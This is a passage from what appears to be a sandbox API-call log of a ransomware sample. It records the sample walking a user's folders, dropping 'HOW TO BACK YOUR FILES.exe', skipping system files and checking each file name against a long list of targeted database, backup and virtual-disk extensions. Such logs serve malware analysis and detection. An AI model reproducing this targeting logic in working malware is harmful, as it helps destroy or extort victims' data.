szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.915] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.915] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.915] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.915] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.915] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0091.915] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.915] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.915] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.915] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0091.915] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.915] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0091.915] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.915] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0091.916] CloseHandle (hObject=0x15c) returned 1 [0091.916] CloseHandle (hObject=0x118) returned 1 [0091.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5957950, ftCreationTime.dwHighDateTime=0x1d4d506, ftLastAccessTime.dwLowDateTime=0x55d76880, ftLastAccessTime.dwHighDateTime=0x1d4d156, ftLastWriteTime.dwLowDateTime=0x55d76880, ftLastWriteTime.dwHighDateTime=0x1d4d156, nFileSizeHigh=0x0, nFileSizeLow=0x626e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_ibRiCNb.mkv", cAlternateFileName="")) returned 0 [0091.917] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0091.917] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cd0 [0091.917] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX" [0091.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfe70 | out: hHeap=0x2b0000) returned 1 [0091.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0091.917] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX") returned 95 [0091.917] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX" [0091.917] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.917] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\hhab9kiyb-giuesnbjlx\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.918] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.918] GetLastError () returned 0x0 [0091.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.918] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.918] CloseHandle (hObject=0x120) returned 1 [0091.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.918] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb8dd3b0, ftCreationTime.dwHighDateTime=0x1d4c8ea, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d09faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.918] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.918] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.918] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.918] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb8dd3b0, ftCreationTime.dwHighDateTime=0x1d4c8ea, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d09faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.918] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.918] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.918] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.918] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.919] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d09faa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.919] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.919] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bc6af90, ftCreationTime.dwHighDateTime=0x1d4cb5e, ftLastAccessTime.dwLowDateTime=0x6f3dab90, ftLastAccessTime.dwHighDateTime=0x1d4c55d, ftLastWriteTime.dwLowDateTime=0x6f3dab90, ftLastWriteTime.dwHighDateTime=0x1d4c55d, nFileSizeHigh=0x0, nFileSizeLow=0x1379, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MVuwqaGtdA.flv", cAlternateFileName="MVUWQA~1.FLV")) returned 1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="aoldtz.exe") returned 1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2=".") returned 1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="..") returned 1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="windows") returned -1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="bootmgr") returned 1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="temp") returned -1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="pagefile.sys") returned -1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="boot") returned 1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="ids.txt") returned 1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="ntuser.dat") returned -1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="perflogs") returned -1 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2="MSBuild") returned 1 [0091.919] lstrlenW (lpString="MVuwqaGtdA.flv") returned 14 [0091.919] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX\\*") returned 97 [0091.919] lstrcpyW (in: lpString1=0x2cce4c0, lpString2="MVuwqaGtdA.flv" | out: lpString1="MVuwqaGtdA.flv") returned="MVuwqaGtdA.flv" [0091.919] lstrlenW (lpString="MVuwqaGtdA.flv") returned 14 [0091.919] lstrlenW (lpString="Ares865") returned 7 [0091.919] lstrcmpiW (lpString1="tdA.flv", lpString2="Ares865") returned 1 [0091.919] lstrlenW (lpString=".dll") returned 4 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2=".dll") returned 1 [0091.919] lstrlenW (lpString=".lnk") returned 4 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2=".lnk") returned 1 [0091.919] lstrlenW (lpString=".ini") returned 4 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2=".ini") returned 1 [0091.919] lstrlenW (lpString=".sys") returned 4 [0091.919] lstrcmpiW (lpString1="MVuwqaGtdA.flv", lpString2=".sys") returned 1 [0091.919] lstrlenW (lpString="MVuwqaGtdA.flv") returned 14 [0091.919] lstrlenW (lpString="bak") returned 3 [0091.919] lstrcmpiW (lpString1="flv", lpString2="bak") returned 1 [0091.919] lstrlenW (lpString="ba_") returned 3 [0091.919] lstrcmpiW (lpString1="flv", lpString2="ba_") returned 1 [0091.919] lstrlenW (lpString="dbb") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="dbb") returned 1 [0091.920] lstrlenW (lpString="vmdk") returned 4 [0091.920] lstrcmpiW (lpString1=".flv", lpString2="vmdk") returned -1 [0091.920] lstrlenW (lpString="rar") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="rar") returned -1 [0091.920] lstrlenW (lpString="zip") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="zip") returned -1 [0091.920] lstrlenW (lpString="tgz") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="tgz") returned -1 [0091.920] lstrlenW (lpString="vbox") returned 4 [0091.920] lstrcmpiW (lpString1=".flv", lpString2="vbox") returned -1 [0091.920] lstrlenW (lpString="vdi") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="vdi") returned -1 [0091.920] lstrlenW (lpString="vhd") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="vhd") returned -1 [0091.920] lstrlenW (lpString="vhdx") returned 4 [0091.920] lstrcmpiW (lpString1=".flv", lpString2="vhdx") returned -1 [0091.920] lstrlenW (lpString="avhd") returned 4 [0091.920] lstrcmpiW (lpString1=".flv", lpString2="avhd") returned -1 [0091.920] lstrlenW (lpString="db") returned 2 [0091.920] lstrcmpiW (lpString1="lv", lpString2="db") returned 1 [0091.920] lstrlenW (lpString="db2") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="db2") returned 1 [0091.920] lstrlenW (lpString="db3") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="db3") returned 1 [0091.920] lstrlenW (lpString="dbf") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="dbf") returned 1 [0091.920] lstrlenW (lpString="mdf") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="mdf") returned -1 [0091.920] lstrlenW (lpString="mdb") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="mdb") returned -1 [0091.920] lstrlenW (lpString="sql") returned 3 [0091.920] lstrcmpiW (lpString1="flv", lpString2="sql") returned -1 [0091.920] lstrlenW (lpString="sqlite") returned 6 [0091.920] lstrcmpiW (lpString1="dA.flv", lpString2="sqlite") returned -1 [0091.920] lstrlenW (lpString="sqlite3") returned 7 [0091.920] lstrcmpiW (lpString1="tdA.flv", lpString2="sqlite3") returned 1 [0091.920] lstrlenW (lpString="sqlitedb") returned 8 [0091.921] lstrcmpiW (lpString1="GtdA.flv", lpString2="sqlitedb") returned -1 [0091.921] lstrlenW (lpString="xml") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="xml") returned -1 [0091.921] lstrlenW (lpString="$er") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="$er") returned 1 [0091.921] lstrlenW (lpString="4dd") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="4dd") returned 1 [0091.921] lstrlenW (lpString="4dl") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="4dl") returned 1 [0091.921] lstrlenW (lpString="^^^") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="^^^") returned 1 [0091.921] lstrlenW (lpString="abs") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="abs") returned 1 [0091.921] lstrlenW (lpString="abx") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="abx") returned 1 [0091.921] lstrlenW (lpString="accdb") returned 5 [0091.921] lstrcmpiW (lpString1="A.flv", lpString2="accdb") returned -1 [0091.921] lstrlenW (lpString="accdc") returned 5 [0091.921] lstrcmpiW (lpString1="A.flv", lpString2="accdc") returned -1 [0091.921] lstrlenW (lpString="accde") returned 5 [0091.921] lstrcmpiW (lpString1="A.flv", lpString2="accde") returned -1 [0091.921] lstrlenW (lpString="accdr") returned 5 [0091.921] lstrcmpiW (lpString1="A.flv", lpString2="accdr") returned -1 [0091.921] lstrlenW (lpString="accdt") returned 5 [0091.921] lstrcmpiW (lpString1="A.flv", lpString2="accdt") returned -1 [0091.921] lstrlenW (lpString="accdw") returned 5 [0091.921] lstrcmpiW (lpString1="A.flv", lpString2="accdw") returned -1 [0091.921] lstrlenW (lpString="accft") returned 5 [0091.921] lstrcmpiW (lpString1="A.flv", lpString2="accft") returned -1 [0091.921] lstrlenW (lpString="adb") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="adb") returned 1 [0091.921] lstrlenW (lpString="adb") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="adb") returned 1 [0091.921] lstrlenW (lpString="ade") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="ade") returned 1 [0091.921] lstrlenW (lpString="adf") returned 3 [0091.921] lstrcmpiW (lpString1="flv", lpString2="adf") returned 1 [0091.921] lstrlenW (lpString="adn") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="adn") returned 1 [0091.922] lstrlenW (lpString="adp") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="adp") returned 1 [0091.922] lstrlenW (lpString="alf") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="alf") returned 1 [0091.922] lstrlenW (lpString="ask") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="ask") returned 1 [0091.922] lstrlenW (lpString="btr") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="btr") returned 1 [0091.922] lstrlenW (lpString="cat") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="cat") returned 1 [0091.922] lstrlenW (lpString="cdb") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="cdb") returned 1 [0091.922] lstrlenW (lpString="ckp") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="ckp") returned 1 [0091.922] lstrlenW (lpString="cma") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="cma") returned 1 [0091.922] lstrlenW (lpString="cpd") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="cpd") returned 1 [0091.922] lstrlenW (lpString="dacpac") returned 6 [0091.922] lstrcmpiW (lpString1="dA.flv", lpString2="dacpac") returned -1 [0091.922] lstrlenW (lpString="dad") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="dad") returned 1 [0091.922] lstrlenW (lpString="dadiagrams") returned 10 [0091.922] lstrcmpiW (lpString1="qaGtdA.flv", lpString2="dadiagrams") returned 1 [0091.922] lstrlenW (lpString="daschema") returned 8 [0091.922] lstrcmpiW (lpString1="GtdA.flv", lpString2="daschema") returned 1 [0091.922] lstrlenW (lpString="db-journal") returned 10 [0091.922] lstrcmpiW (lpString1="qaGtdA.flv", lpString2="db-journal") returned 1 [0091.922] lstrlenW (lpString="db-shm") returned 6 [0091.922] lstrcmpiW (lpString1="dA.flv", lpString2="db-shm") returned -1 [0091.922] lstrlenW (lpString="db-wal") returned 6 [0091.922] lstrcmpiW (lpString1="dA.flv", lpString2="db-wal") returned -1 [0091.922] lstrlenW (lpString="dbc") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="dbc") returned 1 [0091.922] lstrlenW (lpString="dbs") returned 3 [0091.922] lstrcmpiW (lpString1="flv", lpString2="dbs") returned 1 [0091.923] lstrlenW (lpString="dbt") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dbt") returned 1 [0091.923] lstrlenW (lpString="dbv") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dbv") returned 1 [0091.923] lstrlenW (lpString="dbx") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dbx") returned 1 [0091.923] lstrlenW (lpString="dcb") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dcb") returned 1 [0091.923] lstrlenW (lpString="dct") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dct") returned 1 [0091.923] lstrlenW (lpString="dcx") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dcx") returned 1 [0091.923] lstrlenW (lpString="ddl") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="ddl") returned 1 [0091.923] lstrlenW (lpString="dlis") returned 4 [0091.923] lstrcmpiW (lpString1=".flv", lpString2="dlis") returned -1 [0091.923] lstrlenW (lpString="dp1") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dp1") returned 1 [0091.923] lstrlenW (lpString="dqy") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dqy") returned 1 [0091.923] lstrlenW (lpString="dsk") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dsk") returned 1 [0091.923] lstrlenW (lpString="dsn") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dsn") returned 1 [0091.923] lstrlenW (lpString="dtsx") returned 4 [0091.923] lstrcmpiW (lpString1=".flv", lpString2="dtsx") returned -1 [0091.923] lstrlenW (lpString="dxl") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="dxl") returned 1 [0091.923] lstrlenW (lpString="eco") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="eco") returned 1 [0091.923] lstrlenW (lpString="ecx") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="ecx") returned 1 [0091.923] lstrlenW (lpString="edb") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="edb") returned 1 [0091.923] lstrlenW (lpString="epim") returned 4 [0091.923] lstrcmpiW (lpString1=".flv", lpString2="epim") returned -1 [0091.923] lstrlenW (lpString="fcd") returned 3 [0091.923] lstrcmpiW (lpString1="flv", lpString2="fcd") returned 1 [0091.924] lstrlenW (lpString="fdb") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fdb") returned 1 [0091.924] lstrlenW (lpString="fic") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fic") returned 1 [0091.924] lstrlenW (lpString="flexolibrary") returned 12 [0091.924] lstrcmpiW (lpString1="uwqaGtdA.flv", lpString2="flexolibrary") returned 1 [0091.924] lstrlenW (lpString="fm5") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fm5") returned -1 [0091.924] lstrlenW (lpString="fmp") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fmp") returned -1 [0091.924] lstrlenW (lpString="fmp12") returned 5 [0091.924] lstrcmpiW (lpString1="A.flv", lpString2="fmp12") returned -1 [0091.924] lstrlenW (lpString="fmpsl") returned 5 [0091.924] lstrcmpiW (lpString1="A.flv", lpString2="fmpsl") returned -1 [0091.924] lstrlenW (lpString="fol") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fol") returned -1 [0091.924] lstrlenW (lpString="fp3") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fp3") returned -1 [0091.924] lstrlenW (lpString="fp4") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fp4") returned -1 [0091.924] lstrlenW (lpString="fp5") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fp5") returned -1 [0091.924] lstrlenW (lpString="fp7") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fp7") returned -1 [0091.924] lstrlenW (lpString="fpt") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="fpt") returned -1 [0091.924] lstrlenW (lpString="frm") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="frm") returned -1 [0091.924] lstrlenW (lpString="gdb") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="gdb") returned -1 [0091.924] lstrlenW (lpString="gdb") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="gdb") returned -1 [0091.924] lstrlenW (lpString="grdb") returned 4 [0091.924] lstrcmpiW (lpString1=".flv", lpString2="grdb") returned -1 [0091.924] lstrlenW (lpString="gwi") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="gwi") returned -1 [0091.924] lstrlenW (lpString="hdb") returned 3 [0091.924] lstrcmpiW (lpString1="flv", lpString2="hdb") returned -1 [0091.925] lstrlenW (lpString="his") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="his") returned -1 [0091.925] lstrlenW (lpString="ib") returned 2 [0091.925] lstrcmpiW (lpString1="lv", lpString2="ib") returned 1 [0091.925] lstrlenW (lpString="idb") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="idb") returned -1 [0091.925] lstrlenW (lpString="ihx") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="ihx") returned -1 [0091.925] lstrlenW (lpString="itdb") returned 4 [0091.925] lstrcmpiW (lpString1=".flv", lpString2="itdb") returned -1 [0091.925] lstrlenW (lpString="itw") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="itw") returned -1 [0091.925] lstrlenW (lpString="jet") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="jet") returned -1 [0091.925] lstrlenW (lpString="jtx") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="jtx") returned -1 [0091.925] lstrlenW (lpString="kdb") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="kdb") returned -1 [0091.925] lstrlenW (lpString="kexi") returned 4 [0091.925] lstrcmpiW (lpString1=".flv", lpString2="kexi") returned -1 [0091.925] lstrlenW (lpString="kexic") returned 5 [0091.925] lstrcmpiW (lpString1="A.flv", lpString2="kexic") returned -1 [0091.925] lstrlenW (lpString="kexis") returned 5 [0091.925] lstrcmpiW (lpString1="A.flv", lpString2="kexis") returned -1 [0091.925] lstrlenW (lpString="lgc") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="lgc") returned -1 [0091.925] lstrlenW (lpString="lwx") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="lwx") returned -1 [0091.925] lstrlenW (lpString="maf") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="maf") returned -1 [0091.925] lstrlenW (lpString="maq") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="maq") returned -1 [0091.925] lstrlenW (lpString="mar") returned 3 [0091.925] lstrcmpiW (lpString1="flv", lpString2="mar") returned -1 [0091.925] lstrlenW (lpString="marshal") returned 7 [0091.925] lstrcmpiW (lpString1="tdA.flv", lpString2="marshal") returned 1 [0091.925] lstrlenW (lpString="mas") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mas") returned -1 [0091.926] lstrlenW (lpString="mav") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mav") returned -1 [0091.926] lstrlenW (lpString="maw") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="maw") returned -1 [0091.926] lstrlenW (lpString="mdbhtml") returned 7 [0091.926] lstrcmpiW (lpString1="tdA.flv", lpString2="mdbhtml") returned 1 [0091.926] lstrlenW (lpString="mdn") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mdn") returned -1 [0091.926] lstrlenW (lpString="mdt") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mdt") returned -1 [0091.926] lstrlenW (lpString="mfd") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mfd") returned -1 [0091.926] lstrlenW (lpString="mpd") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mpd") returned -1 [0091.926] lstrlenW (lpString="mrg") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mrg") returned -1 [0091.926] lstrlenW (lpString="mud") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mud") returned -1 [0091.926] lstrlenW (lpString="mwb") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="mwb") returned -1 [0091.926] lstrlenW (lpString="myd") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="myd") returned -1 [0091.926] lstrlenW (lpString="ndf") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="ndf") returned -1 [0091.926] lstrlenW (lpString="nnt") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="nnt") returned -1 [0091.926] lstrlenW (lpString="nrmlib") returned 6 [0091.926] lstrcmpiW (lpString1="dA.flv", lpString2="nrmlib") returned -1 [0091.926] lstrlenW (lpString="ns2") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="ns2") returned -1 [0091.926] lstrlenW (lpString="ns3") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="ns3") returned -1 [0091.926] lstrlenW (lpString="ns4") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="ns4") returned -1 [0091.926] lstrlenW (lpString="nsf") returned 3 [0091.926] lstrcmpiW (lpString1="flv", lpString2="nsf") returned -1 